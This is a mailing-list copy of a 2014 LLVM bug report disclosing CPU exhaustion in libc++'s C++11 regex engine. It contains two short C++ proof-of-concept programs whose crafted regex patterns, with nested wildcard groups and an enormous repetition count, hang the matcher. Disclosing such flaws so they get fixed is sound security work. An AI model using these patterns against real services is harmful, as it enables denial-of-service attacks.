[LLVMbugs] [Bug 20291] New: libcxx C++11 regex cpu resource exhaustion

bugzilla-daemon at llvm.org bugzilla-daemon at llvm.org
Sun Jul 13 12:47:56 PDT 2014 

http://llvm.org/bugs/show_bug.cgi?id=20291

            Bug ID: 20291
           Summary: libcxx C++11 regex cpu resource exhaustion
           Product: libc++
           Version: 3.4
          Hardware: PC
                OS: FreeBSD
            Status: NEW
          Severity: normal
          Priority: P
         Component: All Bugs
          Assignee: unassignedclangbugs at nondot.org
          Reporter: max at cert.cx
                CC: llvmbugs at cs.uiuc.edu, mclow.lists at gmail.com
    Classification: Unclassified

clang 3.4 objective regex resource exhaustion

I've discovered cpu exhaustion in regex implementation of libcxx.

PoC1:
----------------------------------------------
#include <iostream>
#include <regex> 
#include <string>

using namespace std;

int main() {
    try {
        regex r("(.*(.*){999999999999999999999999999999999})",
regex_constants::extended);
        smatch results;
        string test_str =
"|||||||||||||||||||||||||||||||||||||||||||||||||||||||";
        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (regex_error &e) {
        cout << "extended: what: " << e.what() << "; code: " << e.code() <<
endl;
    }

    return 0;
}
----------------------------------------------

PoC2:
----------------------------------------------
#include <iostream>
#include <regex> 
#include <string>

using namespace std;

int main() {
    try {
        regex r("((((((.*(.*)(.*)(.*).*).*).*).*).*.*)findme)");
        smatch results;
        string test_str =
"|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||";
        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (regex_error &e) {
        cout << "extended: what: " << e.what() << "; code: " << e.code() <<
endl;
    }

    return 0;
}
----------------------------------------------

EXPECTED:
regex_constants::error_complexity

BR,
Maksymilian Arciemowicz
http://cxsecurity.com/

-- 
You are receiving this mail because:
You are on the CC list for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.llvm.org/pipermail/llvm-bugs/attachments/20140713/6ee113fd/attachment.html>

More information about the llvm-bugs mailing list